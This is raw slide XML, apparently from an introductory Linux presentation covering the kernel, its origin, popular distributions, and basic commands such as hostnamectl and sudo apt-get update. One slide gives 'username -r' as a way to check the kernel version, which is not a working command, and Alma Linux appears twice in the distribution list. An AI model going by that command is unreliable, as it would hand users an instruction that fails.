            <a:ext cx="8520600" cy="69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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="725" name="Google Shape;725;p128"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8138" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1082050"/>
            <a:ext cx="9144000" cy="40614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129"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="823238"/>
            <a:ext cx="8839199" cy="366777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What is Linux Kernel ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="Google Shape;736;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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux kernel is a small program which communicate and manage the H/W resources like RAM,CPU,HDD, Network devices, I/O</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.kernel.org/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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Who wrote the first version of Linux Kernel ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="742" name="Google Shape;742;p131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="5239500" cy="22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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It was initially created by Linus Torvalds in 1991</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linus +  Unix = Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Google Shape;743;p131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5938300" y="1152475"/>
            <a:ext cx="2567218" cy="382097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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205275" y="554275"/>
            <a:ext cx="858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How to check latest kernel version available ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="749" name="Google Shape;749;p132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471725" y="1480150"/>
            <a:ext cx="6545400" cy="2753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5800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://kernel.org</a:t>
            </a:r>
            <a:endParaRPr sz="5800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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133"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="582925"/>
            <a:ext cx="8839200" cy="39776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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396425" y="296775"/>
            <a:ext cx="8520600" cy="568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sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>20 Popular Linux Distros (Distributions/OS)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827325" y="952575"/>
            <a:ext cx="3602400" cy="3574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0000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian - minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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rPr>
              <a:t>Fedora </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-min</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu -minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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rPr>
              <a:t>CentOs </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>Kali  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>-minimal</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>Garuda Linux - minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>RedHatEnterpriseLinux(RHEL)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>OpenSUSE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>Linux Mint </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>Manjaro </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>Elementary </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr>
              <a:t>Zorin </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Gentoo </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Arch Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- minimal -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554200" y="952575"/>
            <a:ext cx="3602400" cy="3574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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Oracle Linux -minimal  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>-full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Rocky Linux  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>-minimal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>  -full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Alma Linux    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>-minimal</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Cloud Linux   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>-minimal</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alpine Linux  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>-minimal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>--full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alma Linux   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>-minimal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>--full</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936450" y="4565625"/>
            <a:ext cx="75759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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Used heavily in software companies</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158875" y="554275"/>
            <a:ext cx="8764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How to check which linux kernel we are using?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760;p134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740950" y="1619425"/>
            <a:ext cx="6439500" cy="2402700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-596900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="5800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hostnamectl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-596900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="5800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username -r</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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135"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5775" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="110950" y="207450"/>
            <a:ext cx="8922100" cy="47286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3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How to update the linux OS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771" name="Google Shape;771;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350">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> apt-get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3350">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
